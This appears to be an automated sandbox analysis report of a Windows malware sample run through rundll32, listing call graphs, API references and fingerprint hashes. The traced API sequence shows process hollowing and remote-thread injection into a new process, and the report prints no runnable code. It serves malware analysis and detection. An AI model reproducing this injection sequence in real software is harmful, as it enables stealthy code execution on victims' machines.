SetFileAttributesA 6227->6228 6229 100014dd 6228->6229 6230 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6229->6230 6231 100014f1 6230->6231 6232 10002d31 14 API calls 6231->6232 6233 1000150d 6232->6233 6234 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6233->6234 6235 1000152e 6234->6235 6236 1000300a CreateFileA WriteFile FindCloseChangeNotification 6235->6236 6237 1000154f 6236->6237 6238 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6237->6238 6239 10001570 6238->6239 6240 10001583 LoadLibraryA 6239->6240 6241 10001598 6240->6241 6242 10009730 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA GetModuleFileNameA 6241->6242 6243 100015c4 6242->6243 6244 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6243->6244 6245 100015db 6244->6245 6246 10001635 CreateRemoteThreadEx 6245->6246 6247 10001686 6245->6247 6253 1000166f 6246->6253 6248 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6247->6248 6249 10001697 6248->6249 6250 10003356 26 API calls 6249->6250 6251 1000171a 6250->6251 6252 10001753 CreateRemoteThreadEx 6251->6252 6252->6253 6253->6208 6255 10009531 6254->6255 6256 10009536 6254->6256 6257 10009360 GetModuleHandleA 6255->6257 6258 10009594 6256->6258 6259 10009430 4 API calls 6256->6259 6257->6256 6258->6214 6260 10009579 6259->6260 6260->6214 6263 100017b4 GetPEB 6261->6263 6264 100017c3 6263->6264 7149 1000b360 7150 1000b36d 7149->7150 7151 1000b381 7150->7151 7152 1000b373 FreeLibrary 7150->7152 7152->7150 7152->7151 7213 100099e0 7214 1000b740 2 API calls 7213->7214 7215 100099ee 7214->7215 7216 100099f5 ??3@YAXPAX 7215->7216 7217 100099fe 7215->7217 7216->7217 7230 100045fc 7231 10004633 7230->7231 7232 10005d6f 2 API calls 7231->7232 7233 1000464d 7232->7233 7234 10004786 CreateProcessA 7233->7234 7235 1000487e 7234->7235 7236 100049a4 GetThreadContext 7235->7236 7257 1000496f 7235->7257 7237 10004b18 7236->7237 7238 10009520 5 API calls 7237->7238 7239 10004bcb 7238->7239 7240 10004ccd 7239->7240 7241 10004cdf 7239->7241 7242 10005e5f 3 API calls 7240->7242 7243 10004d24 ReadProcessMemory 7241->7243 7242->7257 7244 10004d39 7243->7244 7245 10004d50 7244->7245 7246 10004d62 NtUnmapViewOfSection 7244->7246 7247 10005e5f 3 API calls 7245->7247 7248 10004d85 7246->7248 7247->7257 7249 10004db1 VirtualAllocEx 7248->7249 7250 10004d9f 7248->7250 7252 10004dfc 7249->7252 7251 10005e5f 3 API calls 7250->7251 7251->7257 7253 10004e16 7252->7253 7255 10004e28 7252->7255 7254 10005e5f 3 API calls 7253->7254 7254->7257 7256 10005084 LocalSize 7255->7256 7270 1000509b 7256->7270 7258 100057c5 7260 10009520 5 API calls 7258->7260 7259 10009520 GetModuleHandleA ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 7259->7270 7261 10005aab 7260->7261 7262 10005bd9 WaitForSingleObject 7261->7262 7263 10005bfd 7261->7263 7262->7263 7263->7257 7264 10005c14 CloseHandle 7263->7264 7265 10005c43 CloseHandle 7264->7265 7266 10005c36 7264->7266 7265->7257 7266->7265 7267 10005f47 2 API calls 7267->7270 7268 10005660 7269 10005e5f 3 API calls 7268->7269 7269->7257 7270->7258 7270->7259 7270->7267 7270->7268

    Executed Functions

    Function 10003356 Relevance: 25.0, APIs: 14, Instructions: 4041COMMON
    Download Yara Rule
    APIs
    • LocalSize.KERNEL32(00000000), ref: 1000372A
    • RtlMoveMemory.NTDLL(00000000,?), ref: 100039B0
    • LocalSize.KERNEL32(00000000), ref: 10003D81
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 1000417F
    • LocalSize.KERNEL32(00000000), ref: 10004484
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: LocalSize$MemoryMove
    • String ID:
    • API String ID: 2329245388-0
    • Opcode ID: 7ace0d35f767871dd564e10688227d60866cd99a6ec69d537ca719f32c9c7f33
    • Instruction ID: 6597548e417ce41973f24dc3fe005e763f74c0b4b92ccc5acbc8f0888a27e9fc
    • Opcode Fuzzy Hash: 7ace0d35f767871dd564e10688227d60866cd99a6ec69d537ca719f32c9c7f33
    • Instruction Fuzzy Hash: 9163A4F5A812568BFB00CF58DCC1699B7F1FF69364B291471E846AB304D378B861DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001817 Relevance: 14.1, APIs: 9, Instructions: 597nativememoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 489 10001817-10001890 call 10008f42 493 10001e94-10001e99 489->493 494 10001896-100018af call 10001f4e call 100017fe 489->494 495 10001eae-10001eba 493->495 510 100018b0-100018b8 494->510 498 10001ebc 495->498 499 10001ecd 495->499 501 10001ebe-10001ec2 498->501 502 10001ed3-10001f06 call 10008f3c * 3 499->502 503 10001f08-10001f15 call 10008f3c 499->503 506 10001ec4-10001ec7 501->506 507 10001ec9-10001ecb 501->507 502->503 512 10001f20-10001f24 503->512 513 10001f17-10001f1d call 10008f3c 503->513 506->501 507->499 514 10001958-10001966 510->514 515 100018be-100018cc call 10001007 510->515 513->512 519 10001968 514->519 520 10001979 514->520 529 100018db-100018df 515->529 530 100018ce-100018d8 call 10008f48 515->530 526 1000196a-1000196e 519->526 522 100019b4-100019dd call 10008f3c call 100024e3 520->522 523 1000197f-100019b2 call 10008f3c * 3 520->523 552 100019e8-100019fb GetModuleHandleA 522->552 553 100019df-100019e5 call 10008f3c 522->553 523->522 532 10001970-10001973 526->532 533 10001975-10001977 526->533 538 100018e1-100018eb call 10008f48 529->538 539 100018ee-10001900 529->539 530->529 532->526 533->520 538->539 544 10001950-10001953 539->544 545 10001906-10001914 call 10001007 539->545 544->510 556 10001923-10001927 545->556 557 10001916-10001920 call 10008f48 545->557 554 10001a0a-10001a12 552->554 555 100019fd-10001a07 call 10008f48 552->555 553->552 562 10001a14-10001a1a call 10008f3c 554->562 563 10001a1d-10001a3c call 100024e3 554->563 555->554 564 10001936-1000194b 556->564 565 10001929-10001933 call 10008f48 556->565 557->556 562->563 575 10001a47-10001a5b call 100027c4 563->575 576 10001a3e-10001a44 call 10008f3c 563->576 564->514 565->564 581 10001a66-10001a85 call 100024e3 575->581 582 10001a5d-10001a63 call 10008f3c 575->582 576->575 587 10001a90-10001aa4 call 100027c4 581->587 588 10001a87-10001a8d call 10008f3c 581->588 582->581 593 10001aa6-10001aac call 10008f3c 587->593 594 10001aaf-10001ace call 100024e3 587->594 588->587 593->594 599 10001ad0-10001ad6 call 10008f3c 594->599 600 10001ad9-10001aed call 100027c4 594->600 599->600 605 10001af8-10001b2a NtAllocateVirtualMemory 600->605 606 10001aef-10001af5 call 10008f3c 600->606 608 10001b39-10001b40 605->608 609 10001b2c-10001b36 call 10008f48 605->609 606->605 608->493 610 10001b46-10001b70 NtReadVirtualMemory 608->610 609->608 613 10001b72-10001b7c call 10008f48 610->613 614 10001b7f-10001b86 610->614 613->614 617 10001e5b-10001e85 NtFreeVirtualMemory 614->617 618 10001b8c-10001b90 614->618 617->493 622 10001e87-10001e91 call 10008f48 617->622 620 10001bc2-10001bcc call 1000283c 618->620 621 10001b96-10001bb3 618->621 620->617 628 10001bd2-10001c06 NtAllocateVirtualMemory 620->628 621->620 629 10001bb5-10001bbf call 10008f48 621->629 622->493 630 10001c15-10001c1c 628->630 631 10001c08-10001c12 call 10008f48 628->631 629->620 634 10001c22-10001c26 630->634 635 10001d56-10001d6e 630->635 631->630 634->635 638 10001c2c-10001c33 634->638 643 10001d70-10001d7a call 10008f48 635->643 644 10001d7d-10001d84 635->644 639 10001c35-10001c46 call 10008f42 638->639 640 10001c48-10001c4e 638->640 639->640 645 10001c50-10001c56 call 10008f3c 640->645 646 10001c59-10001c69 640->646 643->644 644->617 649 10001d8a-10001db6 NtAllocateVirtualMemory 644->649 645->646 651 10001c70-10001c91 call 100097d0 646->651 652 10001c6b 646->652 655 10001dc5-10001dcc 649->655 656 10001db8-10001dc2 call 10008f48 649->656 661 10001c93 651->661 662 10001c96-10001ca7 651->662 652->651 655->617 658 10001dd2-10001dfc 655->658 656->655 665 10001e0b-10001e12 658->665 666 10001dfe-10001e08 call 10008f48 658->666 661->662 669 10001cb6-10001cfd call 10002d17 NtFreeVirtualMemory 662->669 670 10001ca9-10001cb3 call 10008f48 662->670 665->617 671 10001e18-10001e42 NtFreeVirtualMemory 665->671 666->665 681 10001d0c-10001d36 NtFreeVirtualMemory 669->681 682 10001cff-10001d09 call 10008f48 669->682 670->669 674 10001e51-10001e56 671->674 675 10001e44-10001e4e call 10008f48 671->675 674->495 675->674 683 10001d45-10001d51 681->683 684 10001d38-10001d42 call 10008f48 681->684 682->681 683->495 684->683
    APIs
    • GetModuleHandleA.KERNEL32(?,?,?,00000000,00000001,00000001), ref: 100019EE
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00001000,00000040), ref: 10001B1D
    • NtReadVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,?), ref: 10001B63
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,?,00001000,00000040), ref: 10001BF9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001CF0
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001D29
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00003000,00000040), ref: 10001DA9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E35
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E78
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: MemoryVirtual$Free$Allocate$HandleModuleRead
    • String ID:
    • API String ID: 3626904461-0
    • Opcode ID: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction ID: 18045018c71ed80e37ca4e743997fd2e00c365ecd51ce7d830d4e4c8732093b4
    • Opcode Fuzzy Hash: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction Fuzzy Hash: 6D1249B1D10219ABFF40DFA4DC82BEEB7B9EB09390F105035F515B6285E771AA44CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100013D3 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299threadlibraryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 708 100013d3-10001413 call 100017ab call 10009660 713 10001415-1000141b call 10008f3c 708->713 714 1000141e-10001445 GetModuleFileNameA 708->714 713->714 716 10001454-10001472 call 10001817 714->716 717 10001447-10001451 call 10008f48 714->717 723 10001474 716->723 724 10001479-1000149b call 100096a0 716->724 717->716 723->724 727 100014a6-100014c6 724->727 728 1000149d-100014a3 call 10008f3c 724->728 729 100014c8 727->729 730 100014cd-100014f9 call 10009710 call 100024e3 727->730 728->727 729->730 737 10001504-10001512 call 10002d31 730->737 738 100014fb-10001501 call 10008f3c 730->738 743 10001514-1000151a call 10008f3c 737->743 744 1000151d-10001536 call 100024e3 737->744 738->737 743->744 749 10001541-10001554 call 1000300a 744->749 750 10001538-1000153e call 10008f3c 744->750 755 10001556-1000155c call 10008f3c 749->755 756 1000155f-10001578 call 100024e3 749->756 750->749 755->756 761 10001583-10001596 LoadLibraryA 756->761 762 1000157a-10001580 call 10008f3c 756->762 764 100015a5-100015aa 761->764 765 10001598-100015a2 call 10008f48 761->765 762->761 768 100015b5-100015e3 call 10009730 call 100024e3 764->768 769 100015ac-100015b2 call 10008f3c 764->769 765->764 777 100015e5-100015eb call 10008f3c 768->777 778 100015ee-10001610 call 10001336 768->778 769->768 777->778 783 10001612-10001618 call 10008f3c 778->783 784 1000161b-10001620 778->784 783->784 786 10001622-10001628 call 10008f3c 784->786 787 1000162b-1000162f 784->787 786->787 790 10001635-1000166d CreateRemoteThreadEx 787->790 791 10001686-1000169f call 100024e3 787->791 794 1000167c-10001681 790->794 795 1000166f-10001679 call 10008f48 790->795 800 100016a1-100016a7 call 10008f3c 791->800 801 100016aa-1000171f call 10008f42 call 10003356 791->801 797 100017a7-100017aa 794->797 795->794 800->801 808 10001721-10001727 call 10008f3c 801->808 809 1000172a-1000172f 801->809 808->809 810 10001731-10001737 call 10008f3c 809->810 811 1000173a-1000173f 809->811 810->811 815 10001741-10001747 call 10008f3c 811->815 816 1000174a-1000178e call 10008f3c CreateRemoteThreadEx 811->816 815->816 822 10001790-1000179a call 10008f48 816->822 823 1000179d-100017a2 816->823 822->823 823->797
    APIs
    • GetModuleFileNameA.KERNEL32(000000FF), ref: 10001438
    • LoadLibraryA.KERNELBASE(?,?,?,10069CE3,?,?,?), ref: 10001589
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,1000753C,00000000,00000000,00000000,00000000), ref: 10001660
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,Function_00008E08,00000000,00000000,00000000,00000000), ref: 10001781
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: CreateRemoteThread$FileLibraryLoadModuleName
    • String ID: -K NetworkService
    • API String ID: 1086537905-2689450296
    • Opcode ID: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction ID: 192b5ded5049eacffa80d3a177baae0e671814ab7fcffe4313666e61edc3dd04
    • Opcode Fuzzy Hash: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction Fuzzy Hash: 07A121B5E10345ABFB40DFA0CCC2BEE76B9EB14780F104075F605BB286EA75AB149B51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000300A Relevance: 4.7, APIs: 3, Instructions: 220fileCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000020,00000000), ref: 1000308D
    • WriteFile.KERNELBASE(00000000,10007715,00000000,?,00000000), ref: 1000324E
    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 10003270
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: File$ChangeCloseCreateFindNotificationWrite
    • String ID:
    • API String ID: 3805958096-0
    • Opcode ID: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction ID: d20d66cfc10cbe3857bc80674b720ab49801aad87d9546e672d044fe8a3a2069
    • Opcode Fuzzy Hash: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction Fuzzy Hash: C0619AF5D00205AFFB41DFA4DC83BAF77B5EB09380F104075F645AB286E6756A448BA2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10005E5F Relevance: 4.6, APIs: 3, Instructions: 79COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • TerminateProcess.KERNELBASE(00000000,00000000,?,10005668,00000000,00000000), ref: 10005E7D
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005EAC
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005ED8
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle$ProcessTerminate
    • String ID:
    • API String ID: 1541851893-0
    • Opcode ID: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction ID: 36467d162fe4f9701ac00e92914ba883088f779945990f223c5d709893f0a5e0
    • Opcode Fuzzy Hash: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction Fuzzy Hash: 883130B4A00318EBEF00DF94D9C1B9EBB70FB0E351F1050A5EA486B356C7716A54DBA6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10002D31 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 923 10002d31-10002d7f call 10008f42 PathIsDirectoryA 926 10002d81-10002d8b call 10008f48 923->926 927 10002d8e-10002d90 923->927 926->927 929 10002da0-10002dc0 927->929 930 10002d96-10002d9b 927->930 931 10002dc2 929->931 932 10002dc7-10002dec call 10009850 929->932 934 10002fad-10002fb9 930->934 931->932 942 10002dee 932->942 943 10002dff 932->943 936 10002fbb 934->936 937 10002fcc 934->937 939 10002fbd-10002fc1 936->939 940 10002fd2-10002fd7 937->940 941 10002feb-10002ff8 call 10008f3c 937->941 944 10002fc3-10002fc6 939->944 945 10002fc8-10002fca 939->945 946 10002fe4-10002fe9 940->946 947 10002fd9-10002fe3 call 10008f3c 940->947 954 10003003-10003007 941->954 955 10002ffa-10003000 call 10008f3c 941->955 949 10002df0-10002df4 942->949 950 10002e05-10002e0a 943->950 951 10002e1e-10002e39 call 10008f3c call 10001007 943->951 944->939 945->937 946->940 946->941 947->946 956 10002df6-10002df9 949->956 957 10002dfb-10002dfd 949->957 958 10002e17-10002e1c 950->958 959 10002e0c-10002e16 call 10008f3c 950->959 969 10002e48-10002e71 call 10002487 951->969 970 10002e3b-10002e45 call 10008f48 951->970 955->954 956->949 957->943 958->950 958->951 959->958 975 10002e73-10002e79 call 10008f3c 969->975 976 10002e7c-10002ead call 100017fe call 10001f27 969->976 970->969 975->976 983 10002eae-10002eb6 976->983 984 10002fa2-10002fa8 983->984 985 10002ebc-10002ee1 call 10001007 call 10001f27 983->985 984->934 990 10002ef0-10002ef4 985->990 991 10002ee3-10002eed call 10008f48 985->991 993 10002f03-10002f31 call 10002487 990->993 994 10002ef6-10002f00 call 10008f48 990->994 991->990 1000 10002f33-10002f39 call 10008f3c 993->1000 1001 10002f3c-10002f53 PathIsDirectoryA 993->1001 994->993 1000->1001 1003 10002f62-10002f6a 1001->1003 1004 10002f55-10002f5f call 10008f48 1001->1004 1007 10002f70-10002f88 1003->1007 1008 10002f9a-10002f9d 1003->1008 1004->1003 1011 10002f97 1007->1011 1012 10002f8a-10002f94 call 10008f48 1007->1012 1008->983 1011->1008 1012->1011
    APIs
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002D72
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002F46
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: DirectoryPath
    • String ID:
    • API String ID: 1580926078-0
    • Opcode ID: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction ID: 1ec6a9b9599abdcb0927499382ee2c56efe62a98ad550a515e2561b25c9f74a4
    • Opcode Fuzzy Hash: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction Fuzzy Hash: 368151B5E00206ABFB40DFA4DC82BBEB7B5EF193C0F140079E545F6249E771AA548762
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004606 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction ID: 6bd08ba5558e1723e664c623841c749a5d5f02c338c490c126332124de29b97e
    • Opcode Fuzzy Hash: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction Fuzzy Hash: 35B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004610 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction ID: a6a88fea8a15b71c93179c30403b5c246083cf119354f26f4d88da3cc7a861b2
    • Opcode Fuzzy Hash: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction Fuzzy Hash: 56B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000461A Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction ID: 18200786322e2296e48886ba80c3c0a0571579295a8a8f8cccfe2eafa6c45a37
    • Opcode Fuzzy Hash: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction Fuzzy Hash: 33B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004624 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction ID: 2ab24672fad017e54084c68c726b6677777c2dd61183461ce3e7d2b956ec3b11
    • Opcode Fuzzy Hash: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction Fuzzy Hash: 42B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100045FC Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction ID: 4fc1348e7e92fee5a10d5f52c872e9f0b591b432bef915be5527e0563184c5c5
    • Opcode Fuzzy Hash: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction Fuzzy Hash: 85B1A8F1A402529BFF00CFA8DCC1B8977A5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000462E Relevance: 1.8, APIs: 1, Instructions: 319processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction ID: ac85400423f5c659f8c14131d3889ba6e7c23d82175b45f4af381173e65af412
    • Opcode Fuzzy Hash: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction Fuzzy Hash: BCB1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001027 Relevance: 1.8, APIs: 1, Instructions: 294networkCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2908 10001027-10001155 call 10008f42 * 3 call 10009640 call 10008f42 WSAStartup 2919 10001164-100011a0 call 10009520 2908->2919 2920 10001157-10001161 call 10008f48 2908->2920 2925 100011b1-100011b7 2919->2925 2926 100011a2 2919->2926 2920->2919 2928 100011b9 2925->2928 2929 100011be-100011eb call 10009520 2925->2929 2927 100011a4-100011a8 2926->2927 2930 100011aa-100011ad 2927->2930 2931 100011af 2927->2931 2928->2929 2934 100011fc-100011ff 2929->2934 2935 100011ed 2929->2935 2930->2927 2931->2925 2937 10001201 2934->2937 2938 10001206-10001289 call 10008f3c call 10008f42 call 10001007 2934->2938 2936 100011ef-100011f3 2935->2936 2940 100011f5-100011f8 2936->2940 2941 100011fa 2936->2941 2937->2938 2947 100012a8-100012aa 2938->2947 2948 1000128f-10001290 2938->2948 2940->2936 2941->2934 2950 100012b0 2947->2950 2951 100012da-1000132e call 10008f3c call 1000132f call 10008f3c * 3 2947->2951 2949 10001291-100012a4 call 10008f3c 2948->2949 2960 100012a6-100012a7 2949->2960 2954 100012b2-100012d8 call 10008f42 2950->2954 2954->2951 2960->2947
    APIs
    • WSAStartup.WS2_32(?,00000000), ref: 10001148
